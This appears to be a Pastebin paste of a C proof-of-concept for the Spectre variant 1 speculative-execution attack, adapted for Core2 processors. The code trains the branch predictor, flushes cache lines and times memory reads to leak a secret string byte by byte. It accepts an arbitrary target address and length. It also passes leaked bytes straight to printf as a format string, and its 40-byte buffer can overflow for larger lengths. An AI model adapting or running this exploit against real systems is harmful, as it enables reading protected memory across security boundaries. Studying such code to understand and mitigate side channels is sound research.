Advertisement
Ham62

Spectre Core2 Patch.c

Jan 5th, 2018
468
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.91 KB | None | 0 0
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <stdint.h>
  4. #ifdef _MSC_VER
  5. #include <intrin.h> /* for rdtscp and clflush */
  6. #pragma optimize("gt",on)
  7. #else
  8. #include <x86intrin.h> /* for rdtscp and clflush */
  9. #endif
  10.  
  11. /********************************************************************
  12. Victim code.
  13. ********************************************************************/
  14. unsigned int array1_size = 16;
  15. uint8_t unused1[64];
  16. uint8_t array1[160] = {
  17.   1,
  18.   2,
  19.   3,
  20.   4,
  21.   5,
  22.   6,
  23.   7,
  24.   8,
  25.   9,
  26.   10,
  27.   11,
  28.   12,
  29.   13,
  30.   14,
  31.   15,
  32.   16
  33. };
  34. uint8_t unused2[64];
  35. uint8_t array2[256 * 512];
  36.  
  37. char * secret = "The Magic Words are Squeamish Ossifrage.";
  38.  
  39. uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
  40.  
  41. void victim_function(size_t x) {
  42.   if (x < array1_size) {
  43.     temp &= array2[array1[x] * 512];
  44.   }
  45. }
  46.  
  47. /********************************************************************
  48. Analysis code
  49. ********************************************************************/
  50. #define CACHE_HIT_THRESHOLD 300 /* assume cache hit if time <= threshold */
  51.  
  52. /* Report best guess in value[0] and runner-up in value[1] */
  53. void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
  54.   static int results[256];
  55.   int tries, i, j, k, mix_i, junk = 0;
  56.   size_t training_x, x;
  57.   register uint64_t time1, time2;
  58.   volatile uint8_t * addr;
  59.  
  60.   for (i = 0; i < 256; i++)
  61.     results[i] = 0;
  62.   for (tries = 999; tries > 0; tries--) {
  63.  
  64.     /* Flush array2[256*(0..255)] from cache */
  65.     for (i = 0; i < 256; i++)
  66.       _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */
  67.  
  68.     /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
  69.     training_x = tries % array1_size;
  70.     for (j = 29; j >= 0; j--) {
  71.       _mm_clflush( & array1_size);
  72.       for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
  73.  
  74.       /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
  75.       /* Avoid jumps in case those tip off the branch predictor */
  76.       x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
  77.       x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
  78.       x = training_x ^ (x & (malicious_x ^ training_x));
  79.  
  80.       /* Call the victim! */
  81.       victim_function(x);
  82.  
  83.     }
  84.  
  85.     /* Time reads. Order is lightly mixed up to prevent stride prediction */
  86.     for (i = 0; i < 256; i++) {
  87.       mix_i = ((i * 167) + 13) & 255;
  88.       addr = & array2[mix_i * 512];
  89.       __asm__ __volatile__( "xorl %%eax,%%eax\ncpuid\n" :  :  : "eax", "ebx", "ecx", "edx" );
  90.       time1 = __rdtsc(); /* READ TIMER */
  91.       junk = * addr; /* MEMORY ACCESS TO TIME */
  92.       __asm__ __volatile__( "xorl %%eax,%%eax\ncpuid\n" :  :  : "eax", "ebx", "ecx", "edx" );
  93.       time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
  94.       if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
  95.         results[mix_i]++; /* cache hit - add +1 to score for this value */
  96.     }
  97.  
  98.     /* Locate highest & second-highest results results tallies in j/k */
  99.     j = k = -1;
  100.     for (i = 0; i < 256; i++) {
  101.       if (j < 0 || results[i] >= results[j]) {
  102.         k = j;
  103.         j = i;
  104.       } else if (k < 0 || results[i] >= results[k]) {
  105.         k = i;
  106.       }
  107.     }
  108.     if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
  109.       break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  110.   }
  111.   results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  112.   value[0] = (uint8_t) j;
  113.   score[0] = results[j];
  114.   value[1] = (uint8_t) k;
  115.   score[1] = results[k];
  116. }
  117.  
  118. int main(int argc,
  119.   const char * * argv) {
  120.   size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  121.   int i, score[2], len = 40;
  122.   uint8_t value[2];
  123.  
  124.   char* ReadString = malloc(40);
  125.   int CharPos = 0;
  126.  
  127.   for (i = 0; i < sizeof(array2); i++)
  128.     array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  129.   if (argc == 3) {
  130.     sscanf(argv[1], "%p", (void * * )( & malicious_x));
  131.     malicious_x -= (size_t) array1; /* Convert input value into a pointer */
  132.     sscanf(argv[2], "%d", & len);
  133.   }
  134.  
  135.   printf("Reading %d bytes:\n", len);
  136.   while (--len >= 0) {
  137.     printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
  138.     readMemoryByte(malicious_x++, value, score);
  139.     printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
  140.     printf("0x%02X='%c' score=%d ", value[0],
  141.       (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
  142.     if (score[1] > 0)
  143.       printf("(second best: 0x%02X score=%d)", value[1], score[1]);
  144.     printf("\n");
  145.  
  146.     ReadString[CharPos] = value[0]; // Store read chars into string for output
  147.     CharPos += 1;
  148.   }
  149.  
  150.   ReadString[CharPos] = 0;
  151.   printf(ReadString);   // Print read string to console
  152.  
  153.   printf("\n\nPress enter to quit...");
  154.   getchar();
  155.  
  156.   return (0);
  157. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement